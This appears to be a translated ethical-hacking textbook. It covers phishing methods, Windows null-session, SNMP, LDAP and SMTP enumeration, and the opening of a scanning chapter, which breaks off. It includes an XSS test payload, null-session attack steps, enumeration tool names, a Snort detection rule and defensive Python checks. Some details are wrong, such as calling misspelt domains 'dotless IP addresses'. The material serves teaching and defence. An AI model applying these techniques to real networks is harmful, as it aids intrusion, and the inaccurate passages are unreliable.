Understand the importance of password security. Changing passwords at regular intervals, knowing what makes a password strong, and the other security measures are very important for network security. Know the different types of password attack. Passive online attacks include sniffing, man-in-the-middle, and replay. Active online attacks include automated password guessing. Offline attacks include dictionary, hybrid, and brute force. Non-electronic attacks include shoulder surfing, keyboard sniffing, and social engineering. Know how evidence of hacking activity is removed by attackers: clearing the event log and disabling auditing are the methods attackers use to cover their tracks. Recognise that hidden files are the means used to extract sensitive information. Steganography, NTFS file streams, and the attrib command are ways hackers can hide and steal files.


CHAPTER 7: PHISHING
Suppose one day you open your email and find a notice from your bank. You have received email from this bank before, but this message looks suspicious, especially since it demands that you respond immediately or your account will be closed. What would you do?

Messages like this one are examples of phishing, a method of identity theft that steals personal data. Besides stealing personal and financial information, phishers can infect computers with viruses and persuade people to take part unknowingly in money laundering.

Most people encounter phishing through fraudulent emails impersonating banks, credit companies, or businesses such as Amazon and eBay. These emails look very real and try to persuade victims to reveal personal information. However, email messages are only a small part of phishing in the field of computer security.

1. What Is Phishing?
Phishing is a form of fraud that obtains sensitive information such as user names, passwords and credit card details by masquerading as a trustworthy entity in online communication. The communication usually takes place on well-known social networking sites, auction sites, or online shopping sites, where most users are not on their guard. Phishing uses email or instant messages sent to users asking them to supply the required information. Out of carelessness, users provide their information to a website that looks legitimate but is in fact a fake site set up by hackers. Phishing is an example of social engineering used to deceive users and exploit weaknesses in the security of current websites. Recent efforts against phishing range from applying new security technologies to training staff and raising public awareness. The fraud technique was described in detail in 1987, together with the first records of the term phishing. The word phishing combines fishing and phreaking. Fishing originally means catching fish, but here it is understood as fishing for users' information. Its character also resembles phreaking (hackers replaced the F with Ph, which sounds the same, to form phishing), first made famous by the hacker John Draper (alias Captain Crunch), who in the early 1970s used a Blue Box against the US telephone system to make free long-distance calls or to place illegal calls over other people's lines, also known as phone phreaking. Over time, phishing attacks stopped targeting only AOL Internet accounts and expanded to many targets, particularly online banks, e-commerce services and online payment; most major banks in the US, the UK and Australia have been hit by phishing. Because it also targets the theft of credit cards, it is also called carding. Being simple to carry out yet highly effective, phishing quickly became one of the most common kinds of online fraud: an estimated nearly 70% of attacks on the Internet in 2003 were related to phishing (source: Antiphishing.org).

2. Factors That Make a Phishing Attack Succeed

Phishing is one of the techniques of social engineering; it too relies mainly on human weakness. It is the carelessness and complacency of users that helps the attacker succeed. The following factors help a phishing attack succeed.

Lack of knowledge


A lack of understanding of networks and computers helps hackers extract sensitive information. You need to understand how the Internet works, or at least how to access a website safely. Most typically, you need to know that clicking the Save Password button when browsing at a public access point increases the risk of your personal account being compromised. In particular, people who regularly buy and pay online must understand how important it is to be careful about giving out credit card details, and know when to provide them and when not to. You should also learn a little about network protocols and be able to tell which ones are secure: never carry out an online transaction over plain http; make sure it is protected with https. The Windows warning dialogs about the security level of the information you are accessing, which most people ignore, are precisely the risk that turns you into a victim. Poor email habits also expose you to danger. Some advice: be wary of emails without a clear sender address, without a subject, or with content designed to provoke curiosity.

Visual deception
The art of visual deception is to make the victim unable to tell the real from the fake. You probably know the game of spotting the differences between two pictures. Visual deception creates a web page or a letter that looks like something you visit every day, glued together so well that the forgery is almost impossible to spot. The advice is to be careful with the sites you visit regularly, and especially with emails from your bank or from relatives that ask you to provide information, because such pages are very likely to be faked. Second, type the website address into the browser yourself instead of clicking a link from another page: type https://www.amazone.com into the browser yourself rather than clicking a link in an email that takes you to https://www.amazona.com, a page whose content looks exactly like amazone.

Not paying attention to security indicators


As mentioned above, users usually ignore warnings, which is exactly what helps the hacker succeed. Users also tend not to pay attention to security indicators. For example, when you visit an online payment website you must understand the security rules for this kind of site, such as the certificate information, the provider, the content, and many other rules. Windows usually recognises these rules and warns you if they are not met. However, users find these warnings annoying and turn them off, and so they become victims. Now and then we should also spend time reading news about the hacker world, to learn about newly invented tricks and become more alert and safer.

3. Phishing Delivery Methods


Email and Spam
The most common phishing technique uses email. The hacker sends mass mailings to valid email addresses, having first collected the addresses with various techniques and tools. Mass collection of email addresses is not necessarily harmful if used properly; advertising campaigns, for instance, depend heavily on such lists. Hackers, however, abuse it to send letters whose content looks legitimate. The content is usually urgent, demanding that the recipient supply information at once. The hacker uses the SMTP protocol together with spoofing of the Mail From field so that the recipient has no suspicion at all. For example, the hacker sends an email that appears to come from the bank, asking the user to supply personal details to unlock their account after some incident. The email usually contains a few links to a website; as explained above, if you are not careful such links lead to a fake website set up by the hacker.

Web-based Delivery
The next phishing technique relies on distributing fraudulent websites. You often see websites that appear to be make-money-online schemes. They ask you for your bank account details so that they can pay your earnings, and you do not hesitate while waiting for real money; in the end no wages arrive and the money in your account is gone too. A more sophisticated fraud also involves making money online: experts estimate that up to 90% of the time you cannot withdraw anything after a long period of hard work. What the fraudsters gain is not your money but your effort reading advertisements, which is paid for by the advertising companies. Another form provokes the user's curiosity by placing banners or advertising text on the page that stirs curiosity, such as pornographic images or hot news. After you click, your computer may be infected with some kind of malware that serves another attack.

IRC and Instant Messaging


Chat, or online conversation, is a familiar term and very useful for communication. However, fraudsters have begun to exploit chatting for their scams. Using attack techniques, fraudsters send instant messages to masses of users; the content usually concerns many users at once and plays on people's curiosity. Because online chat is inconsistent and chatters never see each other, they cannot tell whether the person they are talking to is trustworthy. A sophisticated variant of this fraud is impersonating a chat nickname: the fraudster fakes the nickname of an acquaintance, starts a conversation, and asks for information or tricks the victim into doing something. Recently this scam has flourished in Vietnam: many users chat with friends or relatives and are asked to top up mobile phone credit, and since the victim sees a familiar nickname they do not hesitate to comply.

Trojaned Hosts
As mentioned earlier, fraud does not only target the victim's personal information; it takes many other forms. Another kind of fraud tricks the victim into installing spyware on their computer. The spyware (a trojan or keylogger) then serves another attack purpose. Typically the victim is infected with a trojan and becomes a zombie in a large-scale coordinated attack.

4. The Phishing Process
A phishing scam from start to finish consists of the following stages.
1. Planning: phishers decide which business is a worthwhile target and how to obtain the email addresses of that business's customers. They usually use mass-mailing and address-harvesting methods like spammers.
2. Set-up: once the business and the victims have been identified, the phisher arranges how to distribute the email and collect the data. Usually this means an email address and a website.
3. Attack: this is the step everyone knows; the phisher sends a fake message that appears to come from a trustworthy source.
4. Collection: the phisher gathers the information the victims enter into web pages or pop-up windows.
5. Identity theft and fraud: the phisher uses the collected information to make illegal purchases or commit further fraud.

If the phisher wants to arrange another attack, he evaluates the success and failure rate of the completed scam and starts the process again.

5. Types of Phishing Scam
Using the delivery methods above, fraudsters carry out their scams. Based on how they operate, phishing attacks are classified into the following types.

Man-in-the-Middle Attacks
In this technique the attacker's computer acts as an intermediary between the user's computer and the real website. The attacker sets up an intermediate machine that receives the user's data and forwards it to the real website, or receives the real website's data and forwards it to the user. The data passing back and forth is stored on the attacker's machine. This description immediately brings to mind a proxy server; indeed, proxies are not very trustworthy places to browse the web through. Attackers set up a proxy server and advertise it on the Internet; for whatever reason (a cheaper price when shopping online, say) users turn to this proxy for help accessing the web, and so unwittingly become prey for the hackers. Besides setting up proxy servers to lure prey, attackers also consider attacking existing proxy servers to obtain data: using other attack techniques, the hacker breaks into the proxy's storage, takes the data, analyses it, and gets what they need. Another way to attack in this technique is to divert the path of the data packets. Instead of delivering a packet to the web server, the path is changed so that it reaches the hacker's computer first, which then forwards it. To do this the hacker can use DNS cache poisoning, a technique that diverts packets by corrupting the results of DNS name resolution. Note that this attack technique does not distinguish between HTTP and HTTPS.

URL Obfuscation Attacks


Faking URLs is the next technique we discuss. Here the attacker forges the URL of a heavily visited website. By some means the URL is sent to the user, who carelessly visits it: for example, instead of visiting http://www.amazone.com the user visits http://www.amazione.com.

This technique of slightly altering a URL is known as dotless IP addresses. People think it is simple, but it is not easy at all. You can learn more about this technique at http://morph3us.org/blog/index.php?/archives/35Dotless-IP-addresses-and-URL-Obfuscation.html

Cross-site Scripting Attacks


Cross-Site Scripting (XSS) is one of the most common attack techniques today, and one of the most important security issues for web developers and web users alike. Any website that lets users post content without strictly checking for dangerous code may contain XSS flaws. Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP...) HTML tags or script code that can harm other users. The injected code is mostly written in client-side scripting languages such as JavaScript, JScript or DHTML, and may also be HTML tags. XSS quickly became one of the most common flaws in web applications, and its threat to users keeps growing. Basically XSS, like SQL injection or source injection, consists of requests sent from client machines to the server that inject content beyond the server's control. It may be a request sent from a form, or simply a URL such as http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script> and your browser may well display a message box reading XSS was found !. The code inside the script tag is not limited at all, because it can be replaced with a source file on another server through the script tag's src attribute. That is why we cannot foresee all the dangers of XSS flaws. But whereas other attack techniques can alter the web server's source data (source code, structure, database), XSS only harms the website on the client side, and its direct victims are the visitors of that site. Of course hackers sometimes use this technique to deface websites, but still only the surface of the site. Indeed, since XSS consists of client-side scripts that run only in the client's browser, XSS does not affect the website on the server.
The targets of XSS are none other than the site's other users: when they unknowingly visit pages containing dangerous code planted by hackers, they can be redirected to other websites, have their homepage changed, or worse lose passwords and cookies, and their computer may even be infected with viruses, backdoors or worms.
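To make the search.cgi example above concrete, here is an added Python example (written for this page; it is not the code of any real search.cgi) that renders the results page in two ways: echoing the query unchanged, which turns the URL from the text into live script in every visitor's browser, and with context-appropriate output encoding, which is the standard fix. The page template and the tiny query parser are constructed for the example.

```python
import html
from urllib.parse import quote, unquote_plus, urlsplit

# The request from the text, embedded here as constructed sample input.
ATTACK_URL = "http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>"

# Hypothetical results page: the query lands once in the HTML body and once in a URL.
PAGE = ('<html><body><h1>Results for: {term}</h1>'
        '<a href="/search.cgi?query={again}">Search again</a></body></html>')


def query_param(url, name):
    """Minimal query-string parser; written out so the ';' inside the payload survives."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""


def render_vulnerable(url):
    """search.cgi as the text describes it: the query is echoed into the page unchanged,
    so the <script> in the URL becomes live script in every visitor's browser."""
    term = query_param(url, "query")
    return PAGE.format(term=term, again=term)


def render_fixed(url):
    """Same page with output encoding chosen per context: HTML-escape the text that
    lands in the body, percent-encode the value that lands inside a URL attribute."""
    term = query_param(url, "query")
    return PAGE.format(term=html.escape(term, quote=True), again=quote(term, safe=""))


def has_live_script(page):
    """Crude check used by the tests: does the response still carry a script tag?"""
    return "<script" in page.lower()
```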

Hidden Attacks

The attacker uses HTML, DHTML, or another scripting language to inject into the user's browser, or uses special characters to deceive the user. The method attackers commonly use is hiding frames: the frames are made invisible in the user's browser, and through them the attacker injects malicious code. Another way to attack is to overwrite the content of a web page or change the images on it; through the altered content the attacker inserts malicious code.

6. Countering Online Fraud


The steps you normally take to protect your computer, such as using a firewall and antivirus software, can also help you avoid phishing. You can check the website's SSL certificate and the pre-written notices of your bank or credit card company for additional security measures. In addition, phishers tend to leave certain signs in their email messages and web addresses. When you read an email, look out for:
1. Generic greetings such as Dear Customer. If your bank sends you an official notice it will contain your full name (although some phishers have recently moved to spear phishing, which includes your personal information).
2. Threats about your account and demands for immediate action, such as please respond within 5 days or we will close your account.
3. Requests for personal information. Most businesses did not ask for personal information by phone or email even before phishing became common.
4. Suspicious links. Links that are longer than usual or misspelt can also be a sign of phishing. It is safer to type the website's address into the browser than to click any link in an email.
5. Serious spelling mistakes.
Fortunately, businesses and governments are still fighting phishing. At the end of 2006 the US government directed banks to use security methods, including passwords and methods such as confirmation cards and fingerprint scanners, for online transactions. Many Internet service providers (ISPs) and programmers offer anti-phishing toolbars that help identify secure sites and tell you whether the address you want to visit is registered and processed. They also offer tools for reporting phishing. Other software uses recognition signs to confirm that you are visiting a legitimate address.

Facing phishing

If you receive an e-mail that you believe comes from phishers, do not reply, do not click any link in it, and do not fill in any personal information. Instead, report it to the business being impersonated, using their own website or telephone number rather than any link in the suspicious e-mail. If you believe you have already sent personal information to a phisher, notify:

- the company being impersonated;
- the banks and credit institutions that hold your personal information;
- the nearest police station.

You should also change your password on the site you were tricked about. If you reuse that password on other websites, change it on all of them as well.

Anti-phishing tools

PhishTank SiteChecker: a free website where anyone can check, track and share data about phishing. Visit http://www.phishtank.com/ to use it.

SpoofGuard: a plug-in for Internet Explorer. SpoofGuard places a warning light on the browser toolbar that changes from green to yellow or red when you visit a phishing site. If you try to submit information anyway, SpoofGuard saves the data and warns you. The sensitivity of the warnings can be tuned through its settings.
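The indicators above, turned into automated checks over a constructed message, as an added example that is not part of the original text: generic greeting, urgency phrases, requests for credentials, and suspicious links (IP-literal hosts, link text that shows a different domain from the href, links leaving the sender's domain). The sender addresses, example domains and the 192.0.2.10 address are constructed for the example; a production filter would use a public-suffix list instead of the last-two-labels comparison used here.

```python
"""Automated checks for the phishing indicators above (added example; constructed data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URGENCY = ("within 24 hours", "within 5 days", "account will be closed",
           "verify immediately", "suspended")
GENERIC_GREETING = re.compile(r"^\s*dear\s+(customer|user|member|client)\b", re.I | re.M)
CREDENTIALS = re.compile(r"\b(password|pin|social security|card number)\b", re.I)
URLISH = re.compile(r"^(?:https?://)?[\w.-]+\.[A-Za-z]{2,}(?:[/?#]\S*)?$")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Last two labels of a host name; a real filter would use the public-suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def check_links(html, sender_domain):
    parser = LinkExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        parts = urlparse(href)
        host = parts.hostname or ""
        if not host:                                   # mailto:, anchors, relative links
            continue
        if IPV4.fullmatch(host):
            findings.append(f"IP-literal link: {href}")
        if "@" in parts.netloc:
            findings.append(f"user@host trick in link: {href}")
        if len(href) > 100:
            findings.append(f"unusually long link: {href[:40]}...")
        if URLISH.match(text):                         # visible text looks like a URL
            shown = urlparse(text if "://" in text else "http://" + text).hostname or ""
            if registrable(shown) != registrable(host):
                findings.append(f"link text shows {shown} but points to {host}")
        if registrable(host) != registrable(sender_domain):
            findings.append(f"link leaves the sender's domain: {host}")
    return findings


def check_message(sender, body_text, body_html):
    """Return the list of indicators found; an empty list means nothing suspicious."""
    findings = []
    sender_domain = sender.rsplit("@", 1)[-1]
    if GENERIC_GREETING.search(body_text):
        findings.append("generic greeting")
    lowered = body_text.lower()
    findings += [f"urgency phrase: {p!r}" for p in URGENCY if p in lowered]
    if CREDENTIALS.search(body_text):
        findings.append("asks for credentials or personal data")
    return findings + check_links(body_html, sender_domain)


# Constructed sample messages; 192.0.2.0/24 is the documentation range, not a real host.
PHISH_TEXT = ("Dear Customer,\nUnusual activity was detected. Verify your password within "
              "24 hours or your account will be closed.")
PHISH_HTML = ('<p>Dear Customer,</p><a href="http://192.0.2.10/examplebank.com/login.php">'
              "https://www.examplebank.com/login</a>")
GOOD_TEXT = "Dear Jane Doe,\nYour monthly statement is ready."
GOOD_HTML = '<a href="https://www.examplebank.com/statements">View statement</a>'

if __name__ == "__main__":
    for finding in check_message("security@examplebank.com", PHISH_TEXT, PHISH_HTML):
        print("-", finding)
```

The link checks are the ones that matter most in practice: an IP-literal host, or visible text that names one domain while the href points at another, is hard for a human to spot in a mail client and easy to test for.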

7. Summary
Phishing is a form of fraud, and its tricks grow more sophisticated and harder to predict. At the end of this chapter you should be able to summarize:

- What makes a phishing attack succeed: mostly human and social factors.
- The channels phishing works through: e-mail, spam, chat, the web, and trojaned software.
- The common forms of deception: disguised URLs, fake websites, and fake operating-system notices.
- Facing phishing is perhaps the hardest problem of all: it cannot be eliminated, only lived with, so stay alert.

//////////

CHAPTER 6: Enumeration

Enumeration is the next step in gathering information about the target organization. It takes place after scanning and consists of collecting and analysing user names, machine names, shared resources and services. It actively queries or connects to the target to obtain more specific information.

1. What is enumeration?
Enumeration can be defined as the process of extracting the information obtained during scanning into an organized form. The extracted information concerns the target of the attack: user names, host names, services and shares. Enumeration is usually carried out from inside the network. It involves connecting to the system and directly extracting information from it. The goal is to identify user and system accounts that can be used to attack the target. Finding an administrator account is not strictly necessary, because an account can often be escalated to a higher privilege level than it was originally granted, which in turn gives access to more accounts. The enumeration techniques covered here are:

- Windows 2000 enumeration: extracting user-account information.
- SNMP (Simple Network Management Protocol) enumeration of user information.
- Active Directory enumeration.
- Using e-mail IDs to look up information.

We will discuss each of these techniques in turn in the following sections.

2. Null Session
What is a null session?
When you log on to the operating system, an authentication process takes place: it requires a user name and password. After successful authentication the system determines the user's rights (on Windows it builds an access token for the logon) and starts a session for that user. However, some operating-system services run automatically under a built-in account such as SYSTEM. Such accounts have no password and exist to run services, not for interactive logon. When a connection is made to the system without supplying any credentials at all, the result is a null session.

A null session, also called an IPC$ connection on Windows hosts, is an anonymous connection to a network share that any user on the network can open without credentials.

Null-session attacks have been around since Windows 2000 came into widespread use. Nevertheless, administrators often overlook them when applying network security measures. That can have serious consequences, because an attacker can use a null session to gather most of the information needed to gain remote access to the system. Although no longer new, null-session attacks remain as common and as dangerous as in earlier years. Modern systems are not especially weak in this respect, but penetration tests against Windows machines still show null sessions to be one of the issues worth attention.

How null sessions work


A remote session is created when a user logs on remotely to a computer with a user name and password that have access to system resources. This logon happens over SMB (Server Message Block) and the Windows Server service. Such connections are entirely legitimate when valid credentials are used. A null session occurs when a user connects to a Windows system without supplying a user name or password. This is not possible against ordinary Windows shares, but it is possible against the administrative IPC$ (Interprocess Communication) share. IPC$ is used by Windows processes (running as SYSTEM) to communicate with processes on other machines, and it is reached only over SMB. A share that requires no credentials is meant for programs talking to other programs, but nothing prevents a person from connecting to a computer over that same IPC$ connection. A null session does not grant unlimited access to the host, but it reveals information about the host and, in a domain, about other hosts on the network, which is exactly what an attacker needs to plan an intrusion.

Attacking with a null session


Now that we know how a null session works, can an attacker exploit it easily? Yes, quite easily. A null session can be set up with a built-in Windows command, with no extra tools: the NET command. NET performs many administrative functions. With it we can try to connect to an ordinary share on the target; that connection fails when the credentials are wrong.

Figure 6.2: Failed connection to a network share with the NET command. With the same command we can change the share name to the administrative IPC$ share, and the result is more promising.

Figure 6.3: Successful null-session connection with the NET command. We now have a null session to the victim computer. We still do not have administrative access, so we cannot browse its disks or retrieve passwords. Remember that IPC$ exists for inter-process communication, so our access is limited to what the anonymous (null) logon is allowed to see. The NET command can extract more information from the target, but automated tools take care of that tedious work.
Hacking Tool

Null sessions can be exploited with tools built into Windows such as NET and NET VIEW. As shown above, however, a more involved process is needed to do more, such as listing directories and users. Nbtstat and Enum automate that series of steps, which eventually lead to compromising the system. DumpSec and SuperScan are two graphical tools that support the same work.

Defending against null-session attacks


When thinking about attackers and attacks, the first question is usually whether our own systems are vulnerable. The answer depends on the operating systems in the environment. For Windows 2000, Windows XP and Windows Server 2003 the answer is, to some degree, yes. The attack is harder against later versions, but Windows XP and Windows Server 2003 remain widely deployed. There are several ways to block null sessions.

Blocking null sessions in the Registry

Compatibility with legitimate software, and the fact that most businesses keep older operating systems to control costs, are the two main reasons Windows 2000 workstations and servers still exist. If you still run Windows 2000, a small Registry change blocks information gathering over null sessions. In Regedit, browse to the key HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous, which accepts three values:

- 0: the default. Null-session access is not restricted.
- 1: null sessions are still accepted, but anonymous enumeration of account names and shares is blocked.
- 2: no access without explicit anonymous permissions, which blocks null-session enumeration entirely.

As this shows, null sessions cannot be removed completely, but their reach is limited when the value is set to 2. Be careful with this setting on Windows 2000 servers: it can break clustering. On Windows XP and Windows Server 2003 the same can be done through three Registry values:

HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM
HKLM\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous

Blocking the ports

If the Registry changes above cannot be made, access can be blocked with Windows Firewall or a network firewall by filtering the ports that NetBIOS and SMB use over TCP/IP. Those ports are:

- TCP 135
- UDP 137
- UDP 138
- TCP 139
- TCP and UDP 445

These ports serve all of Windows' network functions, including file sharing, network printing, clustering and remote administration. Note: think carefully before blocking several of these ports at once.

Detecting null sessions with an IDS

If the Registry or firewall changes break network applications, another approach is needed. Instead of blocking enumeration over null sessions, one of the most effective measures is to detect null-session attacks as early as possible and respond promptly, as with any other network security event.

If you run Snort, the most widely used IDS/IPS in production environments, the following rule detects null-session enumeration:

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"NETBIOS NT NULL session"; flow:to_server,established; content:"|00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4E 00 54 00 20 00 31 00 33 00 38 00 31|"; classtype:attempted-recon;)

This rule does not block null sessions; it only reports when one occurs.

Upgrading the operating system

The last solution, mentioned above, is to upgrade. Null sessions are easiest against Windows NT and Windows 2000; from Windows XP and Windows Server 2003 onwards Microsoft restricts anonymous access by default, and later versions restrict it further. Upgrading therefore reduces the exposure, but verify the settings above rather than assuming the default is safe.

3. SNMP enumeration (Simple Network Management Protocol)


About SNMP
SNMP stands for Simple Network Management Protocol. What is a "simple network management protocol"? A protocol is a set of rules that the participants must follow in order to communicate. In data communication, a protocol specifies the structure and format of the data exchanged as well as the order and procedure of the exchange; if one party sends data in the wrong format or out of sequence, the others will not understand it or will refuse the exchange. SNMP is such a protocol, so the components of the network must follow its rules; a device that understands and follows SNMP is said to be SNMP-supported or SNMP-compatible. SNMP is for management: it lets you monitor, read information, receive notifications, and act on a system so that it behaves the way you want. Some examples of what SNMP software can do:

- Monitor the throughput of a router and read its total bytes sent and received.
- Find out how many disks a server has and how much free space each one has.
- Automatically receive an alert when a switch port goes down.
- Shut down ports on a switch.

SNMP components

According to RFC 1157, the SNMP architecture has two kinds of component: network management stations and network elements.

A network management station is usually a computer running SNMP management software (an SNMP management application) that monitors and controls the network elements from one place. A network element is a device, computer or piece of software that supports SNMP and is managed by a management station; elements therefore include devices, hosts and applications.

Figure 6.4: The components of SNMP. A management station can manage many elements, and an element can be managed by several stations. What happens when two stations manage the same element? If both read information from it, both receive the same data. If both act on it, the element carries out both actions in the order they arrive. There is also the SNMP agent: a process running on the network element that provides the element's information to the station, which is what makes the element manageable. Strictly speaking, the application on the station and the agent on the element are the two SNMP processes that actually talk to each other. The following examples make these concepts concrete:

- To manage Windows client machines (elements) from a server (station) over SNMP, install SNMP management software (the application) on the server and enable the SNMP service (the agent) on the clients.
- To monitor the traffic of a router (element) from a server (station), install the SNMP management software (application) on the server and enable SNMP (the agent) on the router.

Object ID

An SNMP-capable device can provide many different pieces of information; each one is called an object (for example, a computer can report its number of disks, number of network ports, bytes sent and received, host name, and the names of running processes). Every object has a name and an identifying number called the Object ID (OID). For example, the device name object is called sysName and its OID is 1.3.6.1.2.1.1.5.
Object access

Each object is either READ_ONLY or READ_WRITE. Every object can be read, but only READ_WRITE objects can have their value changed. For example, the device name (sysName) is READ_WRITE, so it can be changed over SNMP; the number of interfaces (ifNumber) is READ_ONLY and of course cannot be changed that way.
Management Information Base

The MIB (Management Information Base) is a data structure of managed objects used to manage devices on TCP/IP networks. It is the common framework that TCP/IP management protocols, SNMP included, are expected to follow. A MIB can be represented as a file (MIB file) or as a tree (MIB tree), and can be standardized or vendor-defined. A manager can manage a device only when the SNMP manager application and the SNMP agent support the same MIB; both can support several MIBs at once.
SNMP operations

SNMPv1 (RFC 1157) has five operations, each carried by its own message type:

- GetRequest: the station asks the agent for the value of one or more objects.
- GetNextRequest: the station asks for the object that follows the given OID in the MIB tree (used to walk tables).
- SetRequest: the station writes a value to a READ_WRITE object.
- GetResponse: the agent's reply to any of the three requests above.
- Trap: an unsolicited notification from the agent to the station, for example when a link goes down.

What is SNMP enumeration?
SNMP enumeration is the process of using SNMP to list the user accounts on a target system. Almost all network infrastructure devices, such as routers and switches, and Windows systems too, contain an SNMP agent for managing the system or device. SNMP management stations send requests to the agents and the agents reply. Requests and replies refer to variables that the agent software exposes; management stations can also send requests that set the values of certain variables. Management stations receive Trap messages from agents when something important happens on the agent, such as a reboot or an interface failure. SNMP has two "passwords" used to access and configure an SNMP agent from the management station. The first, the read community string, lets you view the configuration of the device or system. The second, the read/write community string, lets you change or edit that configuration. By default the read community string is usually "public" and the read/write string "private". A common security hole is leaving the community strings at their defaults: a hacker can use these default passwords to view or change the configuration of the device. Note also that SNMPv1 and SNMPv2c send the community string in clear text in every packet, so anyone who can sniff traffic to UDP port 161 recovers it whether or not it was changed from the default.

If you wonder how to find the default passwords of such devices, visit www.defaultpassword.com.


Hacking tool

SNMPUtil and IP Network Browser are SNMP enumeration tools.

SNMPUtil collects user-account information over SNMP from Windows systems. Information such as routing tables, ARP tables, IP addresses, MAC addresses, open TCP and UDP ports, user accounts and shares can be read with SNMPUtil from a Windows system that has SNMP enabled. IP Network Browser, from the SolarWinds toolset, also uses SNMP to gather more information about a device that runs an SNMP agent.

Countering SNMP enumeration


The simplest way to prevent SNMP enumeration is to remove the SNMP agents or stop the SNMP service. If SNMP cannot be turned off, change the default read and read/write community strings. Enforce security through Group Policy to add restrictions that prevent anonymous connections. In practice, also limit which management stations may query the agent (the agent's accepted-hosts list or a firewall rule on UDP 161), and prefer SNMPv3 with authentication and encryption, because SNMPv1 and SNMPv2c send community strings in clear text.

4. Active Directory Enumeration


What is Active Directory (AD)?
Active Directory is a database of the resources on the network (called objects) and the information related to those objects. It is not a new concept: Novell had offered a directory service for many years. Although Windows NT 4.0 was a fairly good network operating system, it did not suit enterprise-scale networks. On small networks the Network Neighborhood tool is convenient, but on a large network browsing and searching become a nightmare (worse still if you do not know the exact name of the printer or server you want). Moreover, to manage such a large network you usually had to split it into several domains and set up the appropriate trust relationships between them. Active Directory solves these problems and brings a new level of functionality to the enterprise environment: the directory service in each domain can now store more than ten million objects, enough to serve ten million users per domain.

Functions of Active Directory


- Stores a central list of user account names, their passwords and the computer accounts.
- Provides a server that acts as the authentication server or logon server; this server is called the domain controller.
- Maintains an index that lets computers on the network quickly locate a resource on other computers in the domain.
- Lets us create user accounts with different levels of rights, such as full control over the network, only the right to back up data, or only the right to shut down a server remotely.
- Lets us divide our domain into subdomains or organizational units (OUs) and then delegate the administration of each unit to its own administrators.

Active Directory Enumeration


Active Directory enumeration means querying for information about AD and about the Windows servers that use it. Below we look at enumeration techniques for NTP, LDAP, SMTP and the web.

User account enumeration

This means listing information about users: user name, telephone, e-mail, first name, address, and so on. That information feeds other attacks. For example, if you want to guess a user's password, remember the rule that users tend to pick passwords related to themselves, such as their date of birth, telephone number, house number or licence plate.
Hacking Tool

Sid2user and User2sid are two command-line tools for listing user information: User2sid resolves an account name to its SID, and Sid2user does the reverse, so an attacker can step through RIDs to enumerate accounts even when anonymous listing is restricted. GetAcct is a graphical program that looks up user information on Windows NT and 2000.

LDAP enumeration

LDAP (Lightweight Directory Access Protocol) is the protocol for accessing the directory of AD or of other directory services. A directory has a defined structure, hierarchy and format. Below are a few tools that enumerate over LDAP.
Hacking Tool

Jxplorer: besides enumerating the directory, this tool supports authentication over SSL and even adding, deleting and editing directory entries. Softerra LDAP Browser and LDAPMiner are two other tools with similar functions.

NTP enumeration

NTP (Network Time Protocol) is designed to synchronize time between servers. It runs on UDP port 123. To enumerate information about an NTP server you can use commands such as ntpdate, ntptrace, ntpdc and ntpq.

SMTP enumeration

SMTP (Simple Mail Transfer Protocol) runs on TCP port 25 and is used to submit and relay mail to mail servers; POP3 and IMAP are the protocols clients use to retrieve mail from those servers. To enumerate an SMTP server you can telnet to it and issue commands such as VRFY, EXPN and RCPT TO, whose responses can reveal whether a given user name exists.
Hacking Tool

SMTPscan is a tool that finds information about an SMTP server. It works by sending crafted messages to the server and reading the responses to identify the server software.

Web enumeration

HTTP is the familiar web protocol. It runs on port 80, with port 443 for HTTPS. The user requests content from the web server: we type an address in the browser, and a DNS server resolves it to an IP address. To learn about the web server, capture the response and look at the Server field in the HTTP headers.
Hacking Tool

Asnumber is a small browser add-on that displays information about the server.

Systems using default passwords

Using default passwords and other factory settings on hardware is simply a bad idea. When attacking a system, however, check whether any device still uses a default password. Visit www.phenoelit.de/dpl/dpl.html for a list of device default passwords.

5. Summary
After finishing this chapter you should understand the following:

- User-account enumeration: connecting to the target with protocols such as SMB/CIFS or NetBIOS to query system information.
- What can be enumerated from a system: shared network resources, users, groups and applications.
- What a null session is and the attacks built on it: a connection to the system with an empty user name and password is a null session, and the attacker uses it to enumerate the target.
- The hacking tools used for enumeration, in two groups: those that use NetBIOS and those that use SNMP, such as SNMPUtil and Enum.

///////////

CHAPTER 5: SCANNING
Scanning is the next step in the process of attacking a system. This stage determines a great deal of information about the target. In the previous chapter you studied footprinting and social engineering, which concern people: gathering information about the target organization such as its location and the habits of its staff. In scanning we deal with machines: having found some information about the computers we are after, the next step is to gather information about those computers themselves, such as computer name, IP address, configuration, operating system, running services and open ports. This information lets the hacker plan the attack properly and choose which technique to use. Scanning also tells us whether a system is still active on the network. An ethical hacker uses it to find information about the target system.

1. Types of scanning


After the active and passive reconnaissance of the target system is complete, we scan. Scanning determines whether a system is on the network and whether it is up. Scanning tools gather information about a system such as IP addresses, the operating system, and the services running on the target computers. The following figure lists the three main kinds of scanning we focus on.

Figure 5.1: Types of scanning

Port scanning
